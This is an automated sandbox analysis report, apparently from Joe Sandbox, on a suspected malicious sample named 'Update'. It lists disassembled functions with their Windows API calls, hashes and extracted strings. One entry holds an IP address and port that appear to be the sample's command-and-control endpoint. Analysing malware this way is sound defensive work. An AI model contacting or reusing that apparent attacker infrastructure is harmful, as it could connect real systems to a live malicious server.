                                              • Opcode Fuzzy Hash: 0176463f1efdd890d9640323524718fc8bd7167f12827d9be406da0d1c599aaa
                                              • Instruction Fuzzy Hash: EE51EFB0A05B108FDB25CF2A848869AFBF5BF49704F51896ED5AEC7B00DB70A945CF41
                                              APIs
                                              • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003), ref: 6C1E77DA
                                              • VerSetConditionMask.KERNEL32(00000000), ref: 6C1E77E2
                                              • VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 6C1E77F3
                                              • GetSystemMetrics.USER32(00001000), ref: 6C1E7804
                                                • Part of subcall function 6C1E783A: __EH_prolog3.LIBCMT ref: 6C1E7841
                                                • Part of subcall function 6C1E783A: GetSysColor.USER32(00000016), ref: 6C1E784A
                                                • Part of subcall function 6C1E783A: GetSysColor.USER32(0000000F), ref: 6C1E785D
                                                • Part of subcall function 6C1E783A: GetSysColor.USER32(00000015), ref: 6C1E7874
                                                • Part of subcall function 6C1E783A: GetSysColor.USER32(0000000F), ref: 6C1E7880
                                                • Part of subcall function 6C1E783A: GetDeviceCaps.GDI32(?,0000000C), ref: 6C1E78A8
                                                • Part of subcall function 6C1E783A: GetSysColor.USER32(0000000F), ref: 6C1E78B6
                                                • Part of subcall function 6C1E783A: GetSysColor.USER32(00000010), ref: 6C1E78C4
                                                • Part of subcall function 6C1E783A: GetSysColor.USER32(00000015), ref: 6C1E78D2
                                                • Part of subcall function 6C1E783A: GetSysColor.USER32(00000016), ref: 6C1E78E0
                                                • Part of subcall function 6C1E783A: GetSysColor.USER32(00000014), ref: 6C1E78EE
                                                • Part of subcall function 6C1E783A: GetSysColor.USER32(00000012), ref: 6C1E78FC
                                                • Part of subcall function 6C1E783A: GetSysColor.USER32(00000011), ref: 6C1E790A
                                                • Part of subcall function 6C1E783A: GetSysColor.USER32(00000006), ref: 6C1E7915
                                                • Part of subcall function 6C1E783A: GetSysColor.USER32(0000000D), ref: 6C1E7920
                                                • Part of subcall function 6C1E783A: GetSysColor.USER32(0000000E), ref: 6C1E792B
                                                • Part of subcall function 6C1E783A: GetSysColor.USER32(00000005), ref: 6C1E7936
                                                • Part of subcall function 6C1E783A: GetSysColor.USER32(00000008), ref: 6C1E7944
                                                • Part of subcall function 6C1E783A: GetSysColor.USER32(00000009), ref: 6C1E794F
                                                • Part of subcall function 6C1E783A: GetSysColor.USER32(00000007), ref: 6C1E795A
                                                • Part of subcall function 6C1E783A: GetSysColor.USER32(00000002), ref: 6C1E7965
                                                • Part of subcall function 6C1E783A: GetSysColor.USER32(00000003), ref: 6C1E7970
                                                • Part of subcall function 6C1E783A: GetSysColor.USER32(0000001B), ref: 6C1E797E
                                                • Part of subcall function 6C1E783A: GetSysColor.USER32(0000001C), ref: 6C1E798C
                                                • Part of subcall function 6C1E783A: GetSysColor.USER32(0000000A), ref: 6C1E799A
                                                • Part of subcall function 6C1E7C58: __EH_prolog3_GS.LIBCMT ref: 6C1E7C62
                                                • Part of subcall function 6C1E7C58: GetDeviceCaps.GDI32(?,00000058), ref: 6C1E7C82
                                                • Part of subcall function 6C1E7C58: DeleteObject.GDI32(00000000), ref: 6C1E7CDE
                                                • Part of subcall function 6C1E7C58: DeleteObject.GDI32(00000000), ref: 6C1E7CFC
                                                • Part of subcall function 6C1E7C58: DeleteObject.GDI32(00000000), ref: 6C1E7D1A
                                                • Part of subcall function 6C1E7C58: DeleteObject.GDI32(00000000), ref: 6C1E7D38
                                                • Part of subcall function 6C1E7C58: DeleteObject.GDI32(00000000), ref: 6C1E7D56
                                                • Part of subcall function 6C1E7C58: DeleteObject.GDI32(00000000), ref: 6C1E7D74
                                                • Part of subcall function 6C1E7C58: DeleteObject.GDI32(00000000), ref: 6C1E7D92
                                                • Part of subcall function 6C1E7C58: DeleteObject.GDI32(00000000), ref: 6C1E7DB0
                                                • Part of subcall function 6C1E8177: GetSystemMetrics.USER32(00000031), ref: 6C1E8185
                                                • Part of subcall function 6C1E8177: GetSystemMetrics.USER32(00000032), ref: 6C1E8193
                                                • Part of subcall function 6C1E8177: SetRectEmpty.USER32(?), ref: 6C1E81A6
                                                • Part of subcall function 6C1E8177: EnumDisplayMonitors.USER32(00000000,00000000,6C1E894F,?,?,?), ref: 6C1E81B6
                                                • Part of subcall function 6C1E8177: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 6C1E81C5
                                                • Part of subcall function 6C1E8177: SystemParametersInfoW.USER32(00001002,00000000,?,00000000), ref: 6C1E81F2
                                                • Part of subcall function 6C1E8177: SystemParametersInfoW.USER32(00001012,00000000,?,00000000), ref: 6C1E8206
                                                • Part of subcall function 6C1E8177: SystemParametersInfoW.USER32(0000100A,00000000,?,00000000), ref: 6C1E822C
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Color$DeleteObject$System$Info$Parameters$Metrics$CapsConditionDeviceMask$DisplayEmptyEnumH_prolog3H_prolog3_MonitorsRectVerifyVersion
                                              • String ID:
                                              • API String ID: 2442922003-0
                                              • Opcode ID: 2e7197f4321beb6f8b11b63f1c897a8a9cb4f2ac940ef19f4891c77c998154b7
                                              • Instruction ID: 16c50fda1daf8012eb2abee89c7d5f4b7e46a7d093edf2de944c34a7c469beb4
                                              • Opcode Fuzzy Hash: 2e7197f4321beb6f8b11b63f1c897a8a9cb4f2ac940ef19f4891c77c998154b7
                                              • Instruction Fuzzy Hash: 9D11A3B0A00708ABEB159F759C59FEB76BCEB8A708F40045EE246D6281CBB14A05CFD0
                                              APIs
                                              • _malloc.LIBCMT ref: 10006F31
                                                • Part of subcall function 10006E83: __FF_MSGBANNER.LIBCMT ref: 10006E9C
                                                • Part of subcall function 10006E83: __NMSG_WRITE.LIBCMT ref: 10006EA3
                                                • Part of subcall function 10006E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 10006EC8
                                              • std::exception::exception.LIBCMT ref: 10006F66
                                              • std::exception::exception.LIBCMT ref: 10006F80
                                              • __CxxThrowException@8.LIBCMT ref: 10006F91
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551303488.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000003.00000002.3551255249.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551324667.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551342209.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551359349.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551377013.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                              Similarity
                                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                              • String ID:
                                              • API String ID: 615853336-0
                                              • Opcode ID: d1b741ba0380379decb7d1b22a74743c7f5a7046d8fc72408544d039aac17dad
                                              • Instruction ID: bc3bc25b656f4220cb3330c80879dd0d2e796a6a37b49e0188f73f67aa49fa4f
                                              • Opcode Fuzzy Hash: d1b741ba0380379decb7d1b22a74743c7f5a7046d8fc72408544d039aac17dad
                                              • Instruction Fuzzy Hash: C5F02D3980425BAAFB00DBA4DC91AAD3AE7EB496C0F300025F4149E0D5DFB1EBC0C740
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: __fread_nolock
                                              • String ID: GL\X
                                              • API String ID: 2638373210-767099042
                                              • Opcode ID: f50627584f8ae813fa0e8e73bbecc42529a2e3f3997c3b6ee8ce4f89ae63f6b3
                                              • Instruction ID: 8b21ddb02a9d03af3c7e93a2556c8ad2567f808c6d015fbe12067113eda7a303
                                              • Opcode Fuzzy Hash: f50627584f8ae813fa0e8e73bbecc42529a2e3f3997c3b6ee8ce4f89ae63f6b3
                                              • Instruction Fuzzy Hash: C851F472B042148FCB48CE3DD890A5A73F5EB99718F164269EC48DB785D635EC0A8F91
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 6C1E7428
                                                • Part of subcall function 6C1E777D: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003), ref: 6C1E77DA
                                                • Part of subcall function 6C1E777D: VerSetConditionMask.KERNEL32(00000000), ref: 6C1E77E2
                                                • Part of subcall function 6C1E777D: VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 6C1E77F3
                                                • Part of subcall function 6C1E777D: GetSystemMetrics.USER32(00001000), ref: 6C1E7804
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: ConditionMask$H_prolog3InfoMetricsSystemVerifyVersion
                                              • String ID: (^4l$D}4l
                                              • API String ID: 2710481357-1067907240
                                              • Opcode ID: b27ce7848ae93fdb27c8b7f58ffa033d267512a26e9caac862dd6ec01d0b0708
                                              • Instruction ID: 040696dd2844a6951b364b72bcb3b584e5510392de4231d853675c4a4a7ab2c4
                                              • Opcode Fuzzy Hash: b27ce7848ae93fdb27c8b7f58ffa033d267512a26e9caac862dd6ec01d0b0708
                                              • Instruction Fuzzy Hash: 3351CDB0906F458FD3A9CF3A85417C6FAE0BF89300F10CA2E91AED6660EB7161848F55
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 0432316B
                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 04323183
                                              • GetCurrentThreadId.KERNEL32 ref: 0432322F
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: CurrentThread$ExchangeInterlocked
                                              • String ID:
                                              • API String ID: 4033114805-0
                                              • Opcode ID: 75923cf6a22db9910e41db0d8adb32a3fe17ad06a2ee1c98dfff600a0d96d4a8
                                              • Instruction ID: 58e2976741eba6aed5e07cc4c06216778df4bdc82a116edfd3b466d8e732dd33
                                              • Opcode Fuzzy Hash: 75923cf6a22db9910e41db0d8adb32a3fe17ad06a2ee1c98dfff600a0d96d4a8
                                              • Instruction Fuzzy Hash: E6317F702006129FDB18DF69CA84A67B3E9FF84704B10D52DED6ADB615D739F842CB90
                                              APIs
                                              • __floor_pentium4.LIBCMT ref: 043211E9
                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04321226
                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04321255
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: Virtual$AllocFree__floor_pentium4
                                              • String ID:
                                              • API String ID: 2605973128-0
                                              • Opcode ID: 3331b6cd3d8e075da7121820f86a23c2e88f23401934fd97668f86186ca3d822
                                              • Instruction ID: 5609f1f920a17cd35dabbc737473f925309d928afee356dc4780d9591c4fd01d
                                              • Opcode Fuzzy Hash: 3331b6cd3d8e075da7121820f86a23c2e88f23401934fd97668f86186ca3d822
                                              • Instruction Fuzzy Hash: 99219271A00709AFDB109FA9DA45B6FBBF8EF44705F009569E959E2640EA30B8108750
                                              APIs
                                              • __floor_pentium4.LIBCMT ref: 100011E9
                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 10001226
                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 10001255
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551303488.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000003.00000002.3551255249.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551324667.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551342209.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551359349.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551377013.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                              Similarity
                                              • API ID: Virtual$AllocFree__floor_pentium4
                                              • String ID:
                                              • API String ID: 2605973128-0
                                              • Opcode ID: 7c8a02711727f2d10f68a554ded2e2394815aae473f82a087a4a6f69535250f3
                                              • Instruction ID: 68b1d39f7c788df30121c4cd9fa650265093b70568a06a1b8131812e88253602
                                              • Opcode Fuzzy Hash: 7c8a02711727f2d10f68a554ded2e2394815aae473f82a087a4a6f69535250f3
                                              • Instruction Fuzzy Hash: EB21D170A00709AFEB14DFA9DC85B9EFBF4FF44745F00C5ADE949E2644EA30A8108790
                                              APIs
                                              • __floor_pentium4.LIBCMT ref: 0432112F
                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0432115F
                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04321192
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: Virtual$AllocFree__floor_pentium4
                                              • String ID:
                                              • API String ID: 2605973128-0
                                              • Opcode ID: beb3e7148fa9e4bbb1a3c3ff3d409df779f5aba1972415ad1d0075c62c932a1b
                                              • Instruction ID: bb2ef35ff3c2cf295bb31fc1b357fe2cc8e42f7c9c84ba71ad1c69cab634a5b5
                                              • Opcode Fuzzy Hash: beb3e7148fa9e4bbb1a3c3ff3d409df779f5aba1972415ad1d0075c62c932a1b
                                              • Instruction Fuzzy Hash: D9119371E00708AFEF109FA9DA85B6FFBF8EF44745F008569E959E2640E774B9108750
                                              APIs
                                              • __floor_pentium4.LIBCMT ref: 1000112F
                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 1000115F
                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 10001192
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551303488.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000003.00000002.3551255249.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551324667.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551342209.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551359349.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551377013.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                              Similarity
                                              • API ID: Virtual$AllocFree__floor_pentium4
                                              • String ID:
                                              • API String ID: 2605973128-0
                                              • Opcode ID: 9a9a6dbc4d50d479c69aa6d6b662a424f68bc22565965440325d2e32c173b15c
                                              • Instruction ID: ccfbffdb8cfccccbf267e057733e19453fb850e329b77576dd89ff791b5dae30
                                              • Opcode Fuzzy Hash: 9a9a6dbc4d50d479c69aa6d6b662a424f68bc22565965440325d2e32c173b15c
                                              • Instruction Fuzzy Hash: 77119670A00709ABEB14DFA9DC86B9EF7F4FF04745F008569EE59D2240E671A9148750
                                              APIs
                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 04329E04
                                              • GdipDisposeImage.GDIPLUS(?), ref: 04329E18
                                              • GdipDisposeImage.GDIPLUS(?), ref: 04329E3B
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: Gdip$DisposeImage$BitmapCreateFromStream
                                              • String ID:
                                              • API String ID: 800915452-0
                                              • Opcode ID: 26b8529bd05d4b2e9024fb55a469e35df48efb3b7335a227950b5188914731fd
                                              • Instruction ID: 2523e82445f089e04e810be0e965230877ecc1ab8de75505a122ec2980084001
                                              • Opcode Fuzzy Hash: 26b8529bd05d4b2e9024fb55a469e35df48efb3b7335a227950b5188914731fd
                                              • Instruction Fuzzy Hash: CCF031B6A00229A78B11EF94D9448EFB7B9EF48755F00519AF805B7340DA34AE15CBD1
                                              APIs
                                              • EnterCriticalSection.KERNEL32(0434FB64), ref: 04329ADC
                                              • GdiplusStartup.GDIPLUS(0434FB60,?,?), ref: 04329B15
                                              • LeaveCriticalSection.KERNEL32(0434FB64), ref: 04329B26
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterGdiplusLeaveStartup
                                              • String ID:
                                              • API String ID: 389129658-0
                                              • Opcode ID: c60b3451f1dd8246423faf8b8c499c03d4f4c1d8a0ff3129c4677fc51ff24264
                                              • Instruction ID: 61ac61f725e30868ab544fa64009852ebe3568e2bf5ec90243a33ae0219a730f
                                              • Opcode Fuzzy Hash: c60b3451f1dd8246423faf8b8c499c03d4f4c1d8a0ff3129c4677fc51ff24264
                                              • Instruction Fuzzy Hash: 2BF06275A412099BDF009FD1E86A7FB77B8FB89345F442199E50452140DB763544CBE2
                                              APIs
                                              • DeleteFileW.KERNEL32(6C31F26E,?,6C31F26E,?,?,?,?), ref: 6C32C141
                                              • GetLastError.KERNEL32(?,6C31F26E,?,?,?,?), ref: 6C32C14B
                                              • __dosmaperr.LIBCMT ref: 6C32C152
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: DeleteErrorFileLast__dosmaperr
                                              • String ID:
                                              • API String ID: 1545401867-0
                                              • Opcode ID: 92691a4e482d66b5d0ce3de1d7ff6eda8b6b1d13bcc6321f8b2219f8ca265e93
                                              • Instruction ID: e83fc94acd02cb4d1cdc8a4ef538a8866c587b2f8247cb7d1c195c61c64a74c4
                                              • Opcode Fuzzy Hash: 92691a4e482d66b5d0ce3de1d7ff6eda8b6b1d13bcc6321f8b2219f8ca265e93
                                              • Instruction Fuzzy Hash: 97D012323152486B9F012AF6AC098463B7CEB873B93145719F42CC5A90DF36D8509A91
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551303488.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000003.00000002.3551255249.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551324667.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551342209.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551359349.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551377013.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: 154.82.85.79$18091
                                              • API String ID: 3472027048-3534000569
                                              • Opcode ID: 4513ec0b7f0e3245ec74d41a3833d4d9c4567df1cbadf7205a2421670dd53040
                                              • Instruction ID: d4922cd372dd7236031f7b79510b5f56ce2b8beeb54c8bf7640301d5853f9da9
                                              • Opcode Fuzzy Hash: 4513ec0b7f0e3245ec74d41a3833d4d9c4567df1cbadf7205a2421670dd53040
                                              • Instruction Fuzzy Hash: C9D023F0604871CBE928C500DC5447A7375F7C42513940105FC479B144CB74FC08D550
                                              APIs
                                              • __getptd_noexit.LIBCMT ref: 1000715B
                                                • Part of subcall function 10009896: GetLastError.KERNEL32(00000001,00000000,10007112,10006F0C,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 1000989A
                                                • Part of subcall function 10009896: ___set_flsgetvalue.LIBCMT ref: 100098A8
                                                • Part of subcall function 10009896: __calloc_crt.LIBCMT ref: 100098BC
                                                • Part of subcall function 10009896: DecodePointer.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 100098D6
                                                • Part of subcall function 10009896: GetCurrentThreadId.KERNEL32 ref: 100098EC
                                                • Part of subcall function 10009896: SetLastError.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 10009904
                                              • __freeptd.LIBCMT ref: 10007165
                                                • Part of subcall function 10009A58: TlsGetValue.KERNEL32(?,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009A79
                                                • Part of subcall function 10009A58: TlsGetValue.KERNEL32(?,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009A8B
                                                • Part of subcall function 10009A58: DecodePointer.KERNEL32(00000000,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009AA1
                                                • Part of subcall function 10009A58: __freefls@4.LIBCMT ref: 10009AAC
                                                • Part of subcall function 10009A58: TlsSetValue.KERNEL32(00000021,00000000,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009ABE
                                              • ExitThread.KERNEL32 ref: 1000716E
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551303488.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000003.00000002.3551255249.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551324667.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551342209.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551359349.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551377013.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                              Similarity
                                              • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                              • String ID:
                                              • API String ID: 4224061863-0
                                              • Opcode ID: 13d03437f215ed93d40a7d70e196fa756bd6aa96be3d41e5933ba2785ed1d9c5
                                              • Instruction ID: 88b9861ec1dd8ad2b25034eab61c1c94f8d4b81d5381debfb6d8fd2c6c03db1f
                                              • Opcode Fuzzy Hash: 13d03437f215ed93d40a7d70e196fa756bd6aa96be3d41e5933ba2785ed1d9c5
                                              • Instruction Fuzzy Hash: 79C02B3050060C7BFB00A776CC0E95F3A8DDF811C1F668010F80CC5159EE38FC008291
                                              APIs
                                              • WSAStartup.WS2_32(00000202,?), ref: 6C1C3E03
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Startup
                                              • String ID:
                                              • API String ID: 724789610-184147866
                                              • Opcode ID: df09960881f1881f3f893479b81fb5a2ef2b89d9b9eb7ed3ba159c1500acabf8
                                              • Instruction ID: 077e3ec5f4ad5c87ea89bea26e7658ea6b9f7fd4e0d2b4d8f413b0a2fdca75c5
